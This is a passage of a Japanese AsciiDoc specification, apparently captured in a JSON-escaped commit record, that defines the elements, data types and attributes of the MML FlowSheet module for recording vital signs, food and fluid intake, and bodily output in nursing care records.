+\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:obsCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.2. mmlVs:VitalSignModule\n\u3010\u5185\u5bb9\u3011\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u60c5\u5831 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u3011\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\u6e2c\u5b9a\u3055\u308c\u305f\u4e00\u9023\u306e\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u306e\u6570\u3060\u3051\u7e70\u308a\u8fd4\u3059\u3002(\u4f8b\uff1a\u30e9\u30a6\u30f3\u30c9\u6642\u306b\u8a08\u6e2c\u3055\u308c\u305f\u53ce\u7e2e\u671f\u8840\u5727\u3001\u62e1\u5f35\u671f\u8840\u5727\u3001\u8108\u62cd\u3001\u4f53\u6e29\u3001SpO2\uff09\n\n===== M23.3. 
mmlFs:intake\n\u3010\u5185\u5bb9\u3011\u6c34\u5206\u3084\u98df\u4e8b\u306a\u3069\u306e\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.3.1. mmlFs:intakeType\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u7a2e\u985e\u3002\u4f8b\uff1a\u671d\u98df(\u4e3b)\u3001\u663c\u98df\uff08\u526f\uff09\u3001\u6c34\u5206\u3001\u7d4c\u7ba1\u6804\u990a\u98df\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\u3002 +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs01\n\n===== M23.3.2. mmlFs:intakeVolume\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.3. mmlFs:intakeUnit\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u5358\u4f4d\u3002\/10, ml, g, kcal, \u306a\u3069 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs02\n\n===== M23.3.4. mmlFs:intakePathway\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d4c\u8def\u3002\u7d4c\u53e3\u6442\u53d6\u3001\u7d4c\u7ba1\u3001IVH\u7ba1\u7406\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.5. mmlFs:intakeStartTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.6. mmlFs:intakeEndTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.7. mmlFs:intakeMemo\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u30fb\u30e1\u30e2\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4. mmlFs:bodilyOutput\n\u3010\u5185\u5bb9\u3011\u4f53\u5916\u306b\u6392\u6cc4\u3055\u308c\u308b\u3082\u306e\u306b\u3064\u3044\u3066\u8a18\u9332\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002\u5c3f\u3001\u4fbf\u4ee5\u5916\u306b\u3082\u80f8\u6c34\u3001\u8179\u6c34\u3001\u4f53\u6db2\u3001\u80c6\u6c41\u3001\u305d\u306e\u4ed6\u306e\u5206\u6ccc\u7269\u306a\u3069\u3082\u5bfe\u51e6\u3068\u3059\u308b\u3002 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.4.1. mmlFs:boType\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u7a2e\u985e\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs03\n\n===== M23.4.2. mmlFs:boVolume\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.3. 
mmlFs:boUnit\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u306e\u5358\u4f4d\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs04\n\n===== M23.4.4. mmlFs:boStatus\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u6027\u72b6\u3002\u8edf\u4fbf\u3001\u4e0b\u75e2\u3001\u6df7\u6fc1\u306a\u3069\u3002\u5927\u91cf\u30fb\u4e2d\u7b49\u91cf\u3001\u5c11\u91cf\u306a\u3069\u6570\u5024\u5316\u3067\u304d\u306a\u3044\u5834\u5408\u306b\u306f\u3053\u3053\u306b\u8a18\u8f09\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.5. mmlFs:boColor\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u8272\u8abf\u3002\u9ec4\u8272\u3001\u8336\u8910\u8272\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.6. mmlFs:pathway\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d4c\u8def\u3001\u30ab\u30c6\u30fc\u30c6\u30eb\u3084\u30c9\u30ec\u30fc\u30f3\u3001\u30b9\u30c8\u30de\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.7. mmlFs:boStartTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boEndTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boMemo\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u4fbf\u79d83\u65e5\u76ee\u3001\u51fa\u8840\u306f\u53ce\u675f\u50be\u5411\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.9. mmlFs:boFrequency\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u6642\u9593\u5185\u306e\u6392\u6cc4\u56de\u6570\u3092\u8868\u73fe\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002 +\n\u3010\u7e70\u308a\u8fd4\u3057\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\n\n===== M23.4.10. mmlFs:bofTimes\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u671f\u9593\u5185\u306b\u89b3\u5bdf\u3055\u308c\u305f\u6392\u6cc4\u56de\u6570\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.1. mmlFs:bofPeriodStartTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.2. mmlFs:bofPeriodEndTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u7d42\u4e86\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.3 mmlFs:bofMemo\n\u3010\u5185\u5bb9\u3011\u6570\u5024\u5316\u3055\u308c\u306a\u3044\u983b\u5ea6\u8868\u73fe\u3002\u983b\u56de\u3001\u4e4f\u5c3f\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.4. 
mmlFs:fsMemo\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u305d\u306e\u4ed6\u306e\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3059\u308b\u5185\u5bb9\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n","old_contents":":Author: Shinji KOBAYASHI\n:Email: skoba@moss.gr.jp\n:toc: right\n:toclevels: 2\n:pagenums:\n:numberd:\n:sectnums:\n:imagesdir: .\/figures\n:linkcss:\n\n=== \u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n==== \u76ee\u7684\u3068\u5bfe\u8c61\n\u65e5\u3005\u306e\u4ecb\u8b77\u3084\u770b\u8b77\u3067\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u304a\u3044\u3066\u306f\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u30e2\u30b8\u30e5\u30fc\u30eb\u3068\u3042\u308f\u305b\u3066\u3001\u98df\u4e8b\u6442\u53d6\u91cf\u3001\u6392\u6cc4\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u6271\u3063\u3066\u3044\u304f\u3002\u60f3\u5b9a\u3055\u308c\u308b\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3055\u308c\u308b\u5404\u7a2e\u60c5\u5831\u3067\u3042\u308b\u3002\n\n\u56f3\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u3084\u6442\u98df\u60c5\u5831\u3001\u6392\u6cc4\u306b\u95a2\u3059\u308b\u60c5\u5831\u306f\u7e70\u308a\u8fd4\u3057\u8a18\u9332\u3055\u308c\u308b\u3002\n\n==== namespace\u5ba3\u8a00\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306enamespace\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u5ba3\u8a00\u3059\u308b\u3002\n[source, xml]\n xmlns:mmlFs=\"http:\/\/www.medxml.net\/MML\/v4\/ContentModule\/FlowSheet\/1.0\"\n\n==== \u6587\u66f8\u30d8\u30c3\u30c0\u30fc\u60c5\u5831 (docInfo) \u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u500b\u5225\u4ed5\u69d8\n===== docInfo\n\u5c5e\u6027 contentModuleType \u306b MML0005 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d\u3092\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== title\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f\u75c5\u68df\u3042\u308b\u3044\u306f\u4ecb\u8b77\u65bd\u8a2d\u306a\u3069\u3067\u65e5\u3005\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u4e3b\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3068\u8003\u3048\u3066\u3044\u308b\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u30ec\u30dd\u30fc\u30c8\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u306f\u300c\u4f53\u6e29\u8868\u300d\u3067\u3042\u308b\u3053\u3068\u3092\u524d\u63d0\u3068\u3059\u308b\u304c\u3001\u75c5\u68df\u3067\u6163\u7528\u7684\u306b\u5229\u7528\u3055\u308c\u308b\u300c\u71b1\u578b\u8868\u300d\u300c\u4f53\u6e29\u8868\u300d\u3084\u300c\u6e29\u5ea6\u677f\u300d\u306a\u3069\u304c\u3001\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3053\u3068\u3082\u60f3\u5b9a\u3057\u3066\u3044\u308b\u3002\n\n\u5c5e\u6027\u306e generationPurpose \u306f\uff0cMML0007 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d (\u4f53\u6e29\u8868) \u3068\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== confirmDate\n\u30e2\u30b8\u30e5\u30fc\u30eb\u751f\u6210\u65e5\u3067\u3042\u308a\uff0c\u5168\u4f53\u3068\u3057\u3066\u306e\u5831\u544a\u304c\u306a\u3055\u308c\u305f\u6642\u523b\u3092\u793a\u3059\uff0e\n\n===== 
mmlCi:CreatorInfo\n\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\u3067\u306f\u3001\u591a\u8077\u7a2e\u306b\u308f\u305f\u308b\u8907\u6570\u306e\u4eba\u9593\u304c\u89b3\u5bdf\u3057\u305f\u60c5\u5831\u304c\u4e00\u3064\u306e\u5831\u544a\u66f8\u306b\u8a18\u8f09\u3055\u308c\u308b\u3053\u3068\u304c\u3042\u308b\u3002\u6700\u7d42\u7684\u306a\u8a18\u8f09\u8005\u3042\u308b\u3044\u306f\u4ee3\u8868\u8005\u304c\u4f5c\u6210\u8005\u60c5\u5831\u3068\u3057\u3066\u8a18\u9332\u3055\u308c\u308b\u3002\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u69cb\u9020\u56f3\nimage::mmlfs.png[]\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u4e00\u89a7\u8868\n[options=\"header\"]\n|===\n| |Elements|Attribute|Data types|Occurrence|TableId\n|M23.|mmlFs:FlowSheetModule| | | |\n|M23.1.|mmlFs:context| | | |\n|M23.1.1.|mmlFs:facility| |string| |\n| | |mmlFs:facilityCode|string|#REQUIRED|\n| | |mmlFs:facilityCodeId|string|#REQUIRED|MML0027\n|M23.1.2.|mmlFs:department| |string|?|\n| | |mmlFs:depCode|string|#IMPLIED|MML0028\n| | |mmlFs:depCodeId|string|#IMPLIED|\n|M23.1.3.|mmlFs:ward| |string|?|\n| | |mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:wardCodeId|string|#IMPLIED|\n|M23.1.4.|mmlFs:observer| |string|?|\n| | |mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:obsCodeId|string|#IMPLIED|\n|M23.2.|mmlVs:VitalSignModule| | |*|\n|M23.3.|mmlFs:intake| | |*|\n|M23.3.1.|mmlFs:intakeType| |string| |mmlFs01\n|M23.3.2.|mmlFs:intakeVolume| |decimal|?|\n|M23.3.3.|mmlFs:intakeUnit| |string|?|mmlFs02\n|M23.3.4.|mmlFs:intakePathway| |string|?|\n|M23.3.5.|mmlFs:intakeStartTime| |dateTime|?|\n|M23.3.6.|mmlFs:intakeEndTime| |dateTime|?|\n|M23.3.7.|mmlFs:intakeMemo| |string|?|\n|M23.4.|mmlFs:bodilyOutput| | |*|\n|M23.4.1.|mmlFs:boType| |string| |mmlFs03\n|M23.4.2.|mmlFs:boVolume| |decimal|?|\n|M23.4.3.|mmlFs:boUnit| |string|?|mmlFs04\n|M23.4.4.|mmlFs:boStatus| |string|?|\n|M23.4.5.|mmlFs:boColor| |string|?|\n|M23.4.6.|mmlFs:boPathway| |string|?|\n|M23.4.7.|mmlFs:boStartTime| |dateTime|?|\n|M23.4.8.|mmlFs:boEndTime| |dateTime|?|\n|M23.4.9.|mmlFs:boMemo| |string|?|\n|M23.4.10.|mmlFs:boFrequency| | |*|\n|M23.4.10.1.|mmlFs:bofTimes| |decimal|?|\n|M23.4.10.2.|mmlFs:bofPeriodStartTime| |dateTime|?|\n|M23.4.10.3.|mmlFs:bofPeriodEndTime| |dateTime|?|\n|M23.4.10.4.|mmlFs:bofMemo| |string|?|\n|M23.5.|mmlFs:fsMemo| |string|?|\n|===\nOccurrence\u306a\u3057\uff1a\u5fc5\u305a1\u56de\u51fa\u73fe\uff0c?\uff1a 0\u56de\u3082\u3057\u304f\u306f1\u56de\u51fa\u73fe\uff0c+\uff1a 1\u56de\u4ee5\u4e0a\u51fa\u73fe\uff0c*\uff1a 0 \u56de\u4ee5\u4e0a\u51fa\u73fe\n\n#REQUIRED:\u5fc5\u9808\u5c5e\u6027\uff0c#IMPLIED:\u7701\u7565\u53ef\u80fd\u5c5e\u6027\n\n==== \u30a8\u30ec\u30e1\u30f3\u30c8\u89e3\u8aac\n===== M23. mmlFs:FlowSheetModule\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n\n===== M23.1. mmlFs:context\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u304c\u8a18\u9332\u3055\u308c\u305f\u74b0\u5883\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u8868\u3059\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\n\n===== M23.1.1. 
mmlFs:facility\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u65bd\u8a2d +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:facilityCode|string|#REQUIRED| |\n|mmlFs:facilityCodeId|string|#REQUIRED|MML0027|\u7528\u3044\u305f\u30b3\u30fc\u30c9\u4f53\u7cfb\u306e\u540d\u79f0\u3092\u8a18\u8f09\n|===\n\n===== M23.1.2. mmlFs:department\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u90e8\u7f72 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:depCode|string|#IMPLIED|MML0028|\n|mmlFs:depCodeId|string|#IMPLIED| | \t\tMML0028\u3068\u5165\u529b\n|===\n\n===== M23.1.3. mmlFs:ward\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u75c5\u68df\u30fb\u5834\u6240 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:wardCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.1.4. mmlFs:observer\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u60c5\u5831\u306e\u89b3\u5bdf\u8005 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:obsCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.2. mmlVs:VitalSignModule\n\u3010\u5185\u5bb9\u3011\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u60c5\u5831 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u3011\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\u6e2c\u5b9a\u3055\u308c\u305f\u4e00\u9023\u306e\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u306e\u6570\u3060\u3051\u7e70\u308a\u8fd4\u3059\u3002(\u4f8b\uff1a\u30e9\u30a6\u30f3\u30c9\u6642\u306b\u8a08\u6e2c\u3055\u308c\u305f\u53ce\u7e2e\u671f\u8840\u5727\u3001\u62e1\u5f35\u671f\u8840\u5727\u3001\u8108\u62cd\u3001\u4f53\u6e29\u3001SpO2\uff09\n\n===== M23.3. mmlFs:intake\n\u3010\u5185\u5bb9\u3011\u6c34\u5206\u3084\u98df\u4e8b\u306a\u3069\u306e\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.3.1. mmlFs:intakeType\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u7a2e\u985e\u3002\u4f8b\uff1a\u671d\u98df(\u4e3b)\u3001\u663c\u98df\uff08\u526f\uff09\u3001\u6c34\u5206\u3001\u7d4c\u7ba1\u6804\u990a\u98df\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\u3002 +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs01\n\n===== M23.3.2. 
mmlFs:intakeVolume\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.3. mmlFs:intakeUnit\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u5358\u4f4d\u3002\/10, ml, g, kcal, \u306a\u3069 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs02\n\n===== M23.3.4. mmlFs:intakePathway\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d4c\u8def\u3002\u7d4c\u53e3\u6442\u53d6\u3001\u7d4c\u7ba1\u3001IVH\u7ba1\u7406\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.5. mmlFs:intakeStartTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.6. mmlFs:intakeEndTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.7. mmlFs:intakeMemo\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u30fb\u30e1\u30e2\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4. mmlFs:bodilyOutput\n\u3010\u5185\u5bb9\u3011\u4f53\u5916\u306b\u6392\u6cc4\u3055\u308c\u308b\u3082\u306e\u306b\u3064\u3044\u3066\u8a18\u9332\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002\u5c3f\u3001\u4fbf\u4ee5\u5916\u306b\u3082\u80f8\u6c34\u3001\u8179\u6c34\u3001\u4f53\u6db2\u3001\u80c6\u6c41\u3001\u305d\u306e\u4ed6\u306e\u5206\u6ccc\u7269\u306a\u3069\u3082\u5bfe\u51e6\u3068\u3059\u308b\u3002 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.4.1. mmlFs:boType\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u7a2e\u985e\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs03\n\n===== M23.4.2. 